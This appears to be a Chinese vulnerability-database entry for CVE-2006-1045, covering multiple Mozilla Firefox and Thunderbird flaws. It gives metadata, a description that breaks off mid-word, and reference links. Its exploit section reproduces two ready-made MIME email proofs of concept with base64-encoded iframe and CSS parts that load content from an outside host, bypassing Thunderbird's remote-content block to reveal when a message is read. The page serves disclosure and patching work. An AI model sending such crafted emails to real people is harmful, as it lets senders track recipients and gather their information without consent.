Mozilla Suite/Firefox/SeaMonkey/Thunderbird多个远程安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109830 漏洞类型 设计错误
发布时间 2006-02-28 更新时间 2007-09-05
CVE编号 CVE-2006-1045 CNNVD-ID CNNVD-200603-084
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/27337
https://www.securityfocus.com/bid/16881
https://cxsecurity.com/issue/WLB-2006030014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-084
|漏洞详情
MozillaSuite/Firefox/SeaMokey/Thunderbird都是Mozilla发布的WEB浏览器和邮件新闻组客户端产品。上述产品中存在多个安全漏洞,具体如下:1)攻击者可能通过DHTML相关的攻击导致拒绝服务或执行任意代码。2)Mozilla/Firefox和Thunderbird没有正确地处理CSS"letter-spacing"单元。攻击者可以通过指定很大的数值在内存分配期间溢出整数,导致堆溢出。成功利用这个漏洞的攻击者可以执行任意代码。3)远程攻击者可以向文件框中注入目标文件名然后将该文本框转换为文件上传控件,或更改事件处理器相关的"y"类型,导致读取任意文件。4)攻击者可以利用crypto.generateCRMFRequest方式以用户权限运行任意代码,可能安装恶意软件。5)如果用户在"打印预览"下浏览页面的话,则攻击者可以使用XBL控件中的脚本获得chrome权限。6)攻击者可以通过能够生成负数数组索引的无效且不易察觉的表格相关标签序列执行任意代码。7)攻击者可以利用setTimeout()和新的Firefox1.5数组方式ForEach绕过js_ValueToFunctionObject()中的安全检查,获得权限提升。8)XUL内容窗口与Firefox1.5中新的fasterhistory机制交互可能导致这些窗口变得半透明。攻击者可以利用这个漏洞诱骗用户与无法看到的窗口UI交互,导致执行任意代码。9)如果没有参数便调用了.valueOf.call()和.valueOf.apply()的话,上述函数会返回Object类原型而不是调用者的全局窗口对象。如果调用了另一个窗口的可获得属性的话,这就允许攻击者绕过同源保护,向另一个窗口注入脚本。10)nsHTMLContentSink.cpp在解析特制序列的HTML标签时存在内存破坏漏洞,允许攻击者从栈控制函数指针引用,最终导致执行任意代码。11)攻击者可以利用window.controllers数组绕过同源保护,向另一个站点注入脚本。这可能允许恶意页面窃取cookies或口令之类的信息。如果用户已经登录的话,还可以代表该用户执行操作。12)特权的嵌入XBL绑定的编译范围没有得到正确的保护,攻击者可以通过调用valueOf.call()和alueOf.apply(),或向DOM的docume
|漏洞EXP
source: http://www.securityfocus.com/bid/16881/info

Mozilla Thunderbird is susceptible to multiple remote information-disclosure vulnerabilities. These issues are due to the application's failure to properly enforce the restriction for downloading remote content in email messages.

These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Attackers may also exploit these issues to know whether and when users read email messages.

Mozilla Thunderbird version 1.5 is vulnerable to these issues; other versions may also be affected.

* Iframe Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
</head><body style="margin: 0px; padding: 0px; border: 0px;">
<iframe src="cid:257481cab71f$562e86af@sysdream.com" width="100%"
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/html; name="basic.html"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==

------=_NextPart_000_0000_DE61E470.78F38016--


* CSS Exploit :


Subject: Thunploit by CrashFr !
From: CrashFr<crashfr@chez.com>
To: CrashFr<crashfr@chez.com>
Content-Type: multipart/related; type="multipart/alternative";
boundary="----=_NextPart_000_0000_DE61E470.78F38016"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Test by CrashFr

------=_NextPart_001_0001_06199DF9.5C825A99
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
<html><head>
<link rel="stylesheet" type="text/css"
href="cid:257481cab71f$562e86af@sysdream.com" /></head><body>
</body></html>

------=_NextPart_001_0001_06199DF9.5C825A99--

------=_NextPart_000_0000_DE61E470.78F38016
Content-Type: text/css; name="basic.css"
Content-Transfer-Encoding: base64
Content-ID: <257481cab71f$562e86af@sysdream.com>

QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==

------=_NextPart_000_0000_DE61E470.78F38016--
|受影响的产品
S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64
|参考资料

来源:BID
名称:16881
链接:http://www.securityfocus.com/bid/16881
来源:HP
名称:HPSBUX02156
链接:http://www.securityfocus.com/archive/1/archive/1/446657/100/200/threaded
来源:BUGTRAQ
名称:20060228MozillaThunderbird:MultipleInformationDisclosureVulnerabilities
链接:http://www.securityfocus.com/archive/1/426347
来源:XF
名称:thunderbird-inline-information-disclosure(24959)
链接:http://xforce.iss.net/xforce/xfdb/24959
来源:UBUNTU
名称:USN-276-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-276-1
来源:BID
名称:17516
链接:http://www.securityfocus.com/bid/17516
来源:HP
名称:HPSBUX02156
链接:http://www.securityfocus.com/archive/1/archive/1/446657/100/200/threaded
来源:REDHAT
名称:RHSA-2006:0330
链接:http://www.redhat.com/support/errata/RHSA-2006-0330.html
来源:SUSE
名称:SUSE-SA:2006:004
链接:http://www.novell.com/linux/security/advisories/2006_04_25.html
来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/2006/mfsa2006-26.html
来源:MANDRIVA
名称:MDKSA-2006:078
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:078